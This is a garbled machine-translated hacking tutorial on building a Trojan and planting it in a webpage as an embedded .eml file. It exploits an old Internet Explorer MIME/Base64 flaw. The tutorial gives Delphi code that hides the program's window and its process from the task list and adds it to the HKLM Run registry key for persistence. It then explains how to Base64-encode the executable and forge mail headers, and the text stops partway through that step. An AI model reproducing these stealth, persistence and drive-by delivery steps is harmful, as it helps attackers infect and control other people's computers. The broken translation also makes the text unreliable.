A few days ago, I had a Trojan. I was very wonderful. I didn't receive the email. The second didn't accept the document from the QQ, why do I am Trojan? So I checked the relevant information, I found that the webpage also embedded. The reason is caused by Microsoft's MIME / BASE64 processing vulnerabilities in 2000, but this vulnerability only applies to version of the browser below IE5.5. So what is MIME? In fact, MIME is the abbreviation of MultiMedia Internet Mail Extensions, is a technical specification. It is mainly used in the extension email function, and the mime is still more than this, and the implementation of our B / S mode is in fact, including MIME, which is part of the HTTP protocol. I don't have much to say, let's talk about this Trojan's implementation of this Trojan: 1, first we want to write an ordinary Trojan. 2, package Trojans in * .Eml file (people who don't know after being finished, I thought it was Nima, huh, huh). 3, embed the * .eml into the web. Here we have the tools we have to have: 1, one ordinary programming table flat (such as Delphi, VB, VC, and I use the tools here is delphi) 2, the mail editor (here I use Foxmail 3, HTML editing tool (here I used here is Notepad), I have to make us step by step, let's implement this Trojan ~~~, first we first use Delphi to do a most basic Trojan frame (only one frame here, you will fill yourself.). 1. First, we should hide it when you create a main window. Everyone will first think of it is to hide it with the HIDE method in form's formcreate event, then you are wrong, if you do programs Run an error while we should add Application.showMainform: = false in the formcreate event; this main window is hidden at runtime. 2, we should hide the process of the program and do the other party Ctrl Alt Del in the "Close Program" dialog box. We must use the API function registerServiceProcess to turn the current process to a system service, so that the program hides the program in the task list, this function is usage: DWORD DWPROCESSID, DWORD DWTYPE; but you must use it before using Kernel32 The .DLL is overloaded. Specific usage in the program are as follows: implementationfunction RegisterServiceProcess (dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; {$ R * .DFM} procedure TForm1.FormCreate (Sender: TObject); begin RegisterServiceProcess (GetCurrentProcessID 1); // Register the service END; GetCurrentProcessID is the program ID of this program, 1 is represented as a system service when the process is registered. 3. Load the program when the program is started at the next system. First we should join the Registry unit under Usess, then add this program to the automatic run (HKEY_LOCAL_MACHINE / / SOFTWARE / Microsoft / Windows / CurrentVersion / Run) in the FormCreate event in the main window.
Ok, let's take a look at how the specific program implements: regf: = tregistry.create; // Create a Registry component, this component is a component registered as a component reg.rootkey: = HKEY_LOCAL_MACHINE; / / Set the root key to hkey_local_machineregf. OpenKey ('Software / Microsoft / Windows / CurrentVersion / Run', True); // Opened Software / Microsoft / Windows / CurrentVersion / Run Book REGF.WRITESTRING ('sys', paramstr (0)); // Write inside The path of the program regf.free; // Release the Registry component. Ok, what we do above is the framework of a Trojan. Let's see how to pack this program in the * .eml program. At this time, we have to turn our program into base64 encoding to embed the * .Eml file, here we save, use Foxmail to get it ~. First we create an email in Foxmail and save it. Open the outbox and you will find this email. Click on this message with the right part, click "Original Information" in the pop-up menu, then click on all, then you will be in FileName = "Project1.exe" some "garbled", these garbleds is to become Base64 encoding program. Now put these Base64 encoded programs one side, let's see how this special email is implemented. Usually we know that a message is divided into Baotou, text, deputy, and built-end, here, I will conduct a parsing of the entire process: 1. Open Notepad. 2, let's write in the notepad to write Baotou information: from: "xxxxx" // message from the address, you are not so stupid to write your email address here, huh, huh ~ Subject: mail // message title . Date: Thu, 2 Nov 2000 13:27:33 0100 // Date Mime-Version: 1.0 // Mime version information Content-type: Multipart / Related; // Type.
Type = "multipart / alternative"; boundary = "1" x-priority: 3 // Priority X-msmail-priority: Normal // Microsoft Mail Priority X-unsent: 1 // Not sent information 3, write Body content, this part is written in HTML mail and writes an embedded frame in the Technique. The frame is open is an identifier of an attachment, such as: - 1content-type: multipart / alternative; boundary = "2" --2Content-Type: Text / HTML; Charset = "ISO-8859-1" Content-Transfer-Encoding: Quoted-Printable
